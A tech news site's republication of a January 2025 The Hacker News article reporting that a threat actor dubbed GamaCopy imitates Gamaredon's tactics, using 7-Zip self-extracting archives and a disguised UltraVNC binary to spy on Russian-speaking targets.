Ptechhub
  • News
  • Industries
    • Enterprise IT
    • AI & ML
    • Cybersecurity
    • Finance
    • Telco
  • Brand Hub
    • Lifesight
  • Blogs
No Result
View All Result
  • News
  • Industries
    • Enterprise IT
    • AI & ML
    • Cybersecurity
    • Finance
    • Telco
  • Brand Hub
    • Lifesight
  • Blogs
No Result
View All Result
PtechHub
No Result
View All Result

GamaCopy Mimics Gamaredon Tactics in Cyber Espionage Targeting Russian Entities

The Hacker News by The Hacker News
January 27, 2025
Home Cybersecurity
Share on FacebookShare on Twitter


Jan 27, 2025Ravie LakshmananCyber Espionage / Threat Intelligence

A previously unknown threat actor has been observed copying the tradecraft associated with the Kremlin-aligned Gamaredon hacking group in its cyber attacks targeting Russian-speaking entities.

The campaign has been attributed to a threat cluster dubbed GamaCopy, which is assessed to share overlaps with another hacking group named Core Werewolf, also tracked as Awaken Likho and PseudoGamaredon.

According to the Knownsec 404 Advanced Threat Intelligence team, the attacks leverage content related to military facilities as lures to drop UltraVNC, allowing threat actors to remotely access the compromised hosts.

Cybersecurity

“The TTP (Tactics, Techniques, and Procedures) of this organization imitates that of the Gamaredon organization which conducts attacks against Ukraine,” the company said in a report published last week.

The disclosure arrives nearly four months after Kaspersky revealed that Russian government agencies and industrial entities have been the target of Core Werewolf, with the spear-phishing attacks paving the way for the MeshCentral platform instead of UltraVNC.

The starting point of the attack chain mirrors the one detailed by the Russian cybersecurity company wherein a self-extracting (SFX) archive file created using 7-Zip acts as a conduit to drop next-stage payloads. This includes a batch script that’s responsible for delivering UltraVNC, while also displaying a decoy PDF document.

The UltraVNC executable is given the name “OneDrivers.exe” in a likely effort to evade detection by passing it off as a binary associated with Microsoft OneDrive.

Knownsec 404 said the activity shares several similarities with Core Werewolf campaigns, including using 7z-SFX files to install and execute UltraVNC, port 443 to connect to the server, and the use of the EnableDelayedExpansion command.

“Since its exposure, this organization has frequently mimicked the TTPs used by the Gararedon organization and cleverly used open-source tools as a shield to achieve its own goals while confusing the public,” the company said.

Cybersecurity

GamaCopy is one of the many threat actors that have targeted Russian organizations in the wake of the Russo-Ukrainian war, such as Sticky Werewolf (aka PhaseShifters), Venture Wolf, and Paper Werewolf.

“Groups like PhaseShifters, PseudoGamaredon, and Fluffy Wolf stand out for their relentless phishing campaigns aimed at data theft,” Positive Technologies’ Irina Zinovkina said.

Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.





Source link

Tags: computer securitycyber attackscyber newscyber security newscyber security news todaycyber security updatescyber updatesdata breachhacker newshacking newshow to hackinformation securitynetwork securityransomware malwaresoftware vulnerabilitythe hacker news
The Hacker News

The Hacker News

Next Post
Oxford-Cambridge Arc gets government support | Computer Weekly

Oxford-Cambridge Arc gets government support | Computer Weekly

Recommended.

Cloud, colocation or on-premise? Consider all options | Computer Weekly

Cloud, colocation or on-premise? Consider all options | Computer Weekly

March 25, 2025
LELO launches SONA™ 3 & SONA™ 3 Cruise

LELO launches SONA™ 3 & SONA™ 3 Cruise

July 28, 2025

Trending.

⚡ Weekly Recap: Oracle 0-Day, BitLocker Bypass, VMScape, WhatsApp Worm & More

⚡ Weekly Recap: Oracle 0-Day, BitLocker Bypass, VMScape, WhatsApp Worm & More

October 6, 2025
Cloud Computing on the Rise: Market Projected to Reach .6 Trillion by 2030

Cloud Computing on the Rise: Market Projected to Reach $1.6 Trillion by 2030

August 1, 2025
Stocks making the biggest moves midday: Autodesk, PayPal, Rivian, Nebius, Waters and more

Stocks making the biggest moves midday: Autodesk, PayPal, Rivian, Nebius, Waters and more

July 14, 2025
The Ultimate MSP Guide to Structuring and Selling vCISO Services

The Ultimate MSP Guide to Structuring and Selling vCISO Services

February 19, 2025
Translators’ Voices: China shares technological achievements with the world for mutual benefit

Translators’ Voices: China shares technological achievements with the world for mutual benefit

June 3, 2025

PTechHub

A tech news platform delivering fresh perspectives, critical insights, and in-depth reporting — beyond the buzz. We cover innovation, policy, and digital culture with clarity, independence, and a sharp editorial edge.

Follow Us

Industries

  • AI & ML
  • Cybersecurity
  • Enterprise IT
  • Finance
  • Telco

Navigation

  • About
  • Advertise
  • Privacy & Policy
  • Contact

Subscribe to Our Newsletter

  • About
  • Advertise
  • Privacy & Policy
  • Contact

Copyright © 2025 | Powered By Porpholio

No Result
View All Result
  • News
  • Industries
    • Enterprise IT
    • AI & ML
    • Cybersecurity
    • Finance
    • Telco
  • Brand Hub
    • Lifesight
  • Blogs

Copyright © 2025 | Powered By Porpholio